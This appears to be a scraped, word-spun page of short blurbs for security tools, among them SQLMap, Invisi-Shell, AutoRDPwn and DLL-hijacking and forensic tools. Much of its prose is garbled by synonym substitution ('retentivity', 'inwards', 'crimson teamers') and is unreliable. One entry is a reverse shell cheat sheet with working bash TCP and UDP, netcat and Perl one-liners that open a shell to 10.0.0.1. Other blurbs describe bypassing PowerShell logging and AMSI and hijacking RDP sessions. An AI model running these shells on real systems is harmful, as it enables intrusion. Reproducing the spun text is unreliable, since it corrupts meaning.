sf

BlobRunner is a uncomplicated tool to speedily debug shellcode extracted during malware analysis. BlobRunner allocates retentivity for the target file in addition to jumps to the base of operations (or offset) of the allocated memory. This allows an analyst to speedily debug into extracted artifacts amongst minimal overhead in addition to effort. To role BlobRunner, you lot tin download the compiled executable from the releases page or fix your ain using the steps below. Building Building the executable is conduct forrad in addition to relatively painless. Requirements Download in addition to install Microsoft Visual C++ Build Tools or Visual Studio Build Steps Open Visual Studio Command Prompt Navigate to the directory where BlobRunner is checked out Build the executable past times running: cl blobrunner.c Building BlobRunner x64 Building the x64 version is most the same equally above, but only uses the x64 tooling. Open x64 Visual Studio Command Prompt...

Robber is a costless opened upwardly source tool developed using Delphi XE2 without whatever third political party dependencies. What is DLL hijacking ?! Windows has a search path for DLLs inwards its underlying architecture. If yous tin figure out what DLLs an executable requests without an absolute path (triggering this search process), yous tin as well as then house your hostile DLL somewhere above the search path thence it'll live on constitute earlier the existent version is, as well as Windows volition happilly feed your laid upwardly on code to the application. So, let's pretend Windows's DLL search path looks something similar this: A) . <-- electrical flow working directory of the executable, highest priority, showtime check B) \Windows C) \Windows\system32 D) \Windows\syswow64 <-- lowest priority, final check as well as unopen to executable "Foo.exe" requests "bar.dll", which happens to alive ...

SQLMap is an opened upwards source penetration testing tool that automates the procedure of detecting in addition to exploiting SQL injection flaws in addition to taking over of database servers. It comes alongside a powerful detection engine, many niche features for the ultimate penetration tester in addition to a wide hit of switches lasting from database fingerprinting, over information fetching from the database, to accessing the underlying file organization in addition to executing commands on the operating organization via out-of-band connections. Features Full back upwards for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB in addition to Informix database administration systems. Full back upwards for half-dozen SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries in addition to out-of-band . Support to directly connect to the data...

Burpsuite Plugin to decrypt AES Encrypted traffic on the fly. Requirements Burpsuite Java Tested on Burpsuite 1.7.36 Windows 10 xubuntu 18.04 Kali Linux 2018 What it does The IProxyListener decrypt requests too encrypt responses, too an IHttpListener than encrypt requests too decrypt responses. Burp sees the decrypted traffic, including Repeater, Intruder too Scanner, simply the client/mobile app too server come across the encrypted version. NOTE: Currently back upwards AES/CBC/PKCS5Padding encryption/decryption. How it works Require AES Encryption Key (Can move obtained yesteryear using frida script or reversing mobile app) Require AES Encryption Initialize Vector (Can move obtained yesteryear using frida script or reversing mobile app) Request Parameter (Leave blank inward illustration of whole asking body) Response Parameter (Leave blank inward illustration of whole reply body) Character Separated amongst infinite for obfuscation on request/...

Hide your powershell script inwards obviously sight! Invisi-Shell bypasses all of Powershell safety features (ScriptBlock logging, Module logging, Transcription, AMSI) yesteryear hooking .Net assemblies. The claw is performed via CLR Profiler API. Work In Progress This is nevertheless a preliminary version intended equally a POC. The code industrial plant exclusively on x64 processes together with tested against Powershell V5.1. Usage Copy the compiled InvisiShellProfiler.dll from /x64/Release/ folder alongside the ii batch files from the root directory (RunWithPathAsAdmin.bat & RunWithRegistryNonAdmin.bat) to the same folder. Run either of the batch files (depends if yous bring local admin privelledges or not) Powershell console volition run. Exit the powershell using the leave of absence ascendance (DON'T CLOSE THE WINDOW) to permit the batch file to perform proper cleanup. Compilation Project was created alongside Visual Studio 2013. You should in...

AutoRDPwn is a script created inwards Powershell as well as designed to automate the Shadow assault on Microsoft Windows computers. This vulnerability allows a remote aggressor to stance his victim's desktop without his consent, as well as fifty-fifty command it on request. For its right operation, it is necessary to comply alongside the requirements described inwards the user guide. Requirements Powershell 5.0 or higher Changes Version 4.5 • New ninja agency icon! • Automatic cleaning of Powershell history afterward execution • Now all dependencies are downloaded from the same repository • Many errors as well as bugs fixed • UAC & AMSI bypass inwards 64-bit systems • New module available: Remote Desktop Caching • New module available: Disable arrangement logs (Invoke-Phant0m) • New module available: Sticky Keys Hacking • New available module: Remote Desktop History • New available attack: Session Hijacking (passwordless) WARNING! This assault is real ...

CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux alive distribution created equally a Digital Forensics project. Currently, the projection managing director is Nanni Bassetti (Bari - Italy). CAINE offers a consummate forensic surroundings that is organized to integrate existing software tools equally software modules too to furnish a friendly graphical interface. The primary pattern objectives that CAINE aims to guarantee are the following: an interoperable surroundings that supports the digital investigator during the 4 phases of the digital investigation a user-friendly graphical interface user-friendly tools CAINE represents fully the spirit of the Open Source philosophy because the projection is completely open, everyone could accept on the legacy of the previous developer or projection manager. The distro is opened upwards source, the Windows side is freeware and, the concluding but non least, the distro is installable, so giving t...

Reverse Shell Cheat Sheet Tool Install Note Clone the repository: git clone https://github.com/0xR0/shellver.git Then instruct inside: cd shellver/ Then install it: python setup.py -i run shellver -h or "shellver bash or perl {} python {} php {} ruby {} netcat {} xterm {} musical rhythm out {} all".format (or) Example shellver python shellver all From https://github.com/swisskyrepo Reverse Shell Methods Reverse Shell Cheat Sheet Bash TCP bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196 Bash UDP Victim: sh -i >& /dev/udp/127.0.0.1/4242 0>&1 Listener: nc -u -lvp 4242 Perl perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&...

ZIP File Raider is a Burp Suite extension for attacking spider web application amongst ZIP file upload functionality. You tin easily inject Burp Scanner/Repeater payloads inwards ZIP content of the HTTP requests which is non viable yesteryear default. This extension helps to automate the extraction in addition to compression steps. This software was created yesteryear Natsasit Jirathammanuwat during a cooperative pedagogy course of instruction at King Mongkut's University of Technology Thonburi (KMUTT). Installation Set upward Jython standalone Jar inwards Extender > Options > Python Environment > "Select file...". Add ZIP File Raider extension inwards Extender > Extensions > Add > CompressedPayloads.py (Extension type: Python) How to use Send the HTTP asking amongst a compressed file to the ZIP File Raider First, correct click on the HTTP asking amongst a compressed file inwards HTTP trunk in addition to and therefore direct "Sen...

Sheepl : Creating realistic user behavior for supporting tradecraft evolution within lab environments Introduction There are lots of resources available online relating to how you lot tin educate AD network environments for the evolution of blue team too red team tradecraft. However the electrical current solutions tend to lack 1 of import facial expression inwards representing existent the world network configurations. H5N1 network is non but a collection of static endpoints, it is a platform for communication betwixt people. Sheepl is a tool that aims to yoke the gap past times emulating the behavior that people unremarkably undertake within a network environment. Using Python3 too AutoIT3 the output tin last compiled into a standalone executable without whatever other dependancies that when executed on an Windows endpoint, executes a laid of tasks randomly over a chosen fourth dimension frame. For crimson teamers this tin serve to introduce those moments of chance t...

TIDoS Framework is a comprehensive web-app audit framework. let's proceed this simple Highlights :- The top dog highlights of this framework is: TIDoS Framework straight off boasts of a century+ of modules. A consummate versatile framework to comprehend upward everything from Reconnaissance to Vulnerability Analysis. Has five top dog phases, subdivided into 14 sub-phases consisting a total of 104 modules . Reconnaissance Phase has 48 modules of its ain (including active together with passive recon, information disclosure modules). Scanning & Enumeration Phase has got xv modules (including port scans, WAF analysis, etc) Vulnerability Analysis Phase has 36 modules (including most mutual vulnerabilites inward action). Exploits Castle has alone 1 exploit. (purely developmental) And finally, Auxillaries bring got 4 modules. under dev. All iv phases each bring a Auto-Awesome module which automates every module for you. You simply demand the domain, together with ...

Intel, AMD, VIA & Freescale Microcode Extraction Tool MC Extractor News Feed MC Extractor Discussion Topic Intel, AMD & VIA CPU Microcode Repositories A. About MC Extractor MC Extractor is a tool which parses Intel, AMD, VIA as well as Freescale processor microcode binaries. It tin sack live used yesteryear end-users who are looking for all relevant microcode information such equally CPUID, Platform, Version, Date, Release, Size, Checksum etc. It is capable of converting Intel microcode containers (dat, inc, h, txt) to binary images for BIOS integration, detecting new/unknown microcodes, checking microcode health, Updated/Outdated condition as well as more. MC Extractor tin sack live also used equally a query analysis tool amongst multiple structures which allow, amid others, total parsing & information display of all documented or non microcode Headers. Moreover, amongst the aid of its extensive database, MC Extractor is capable of uniquely categorizing all su...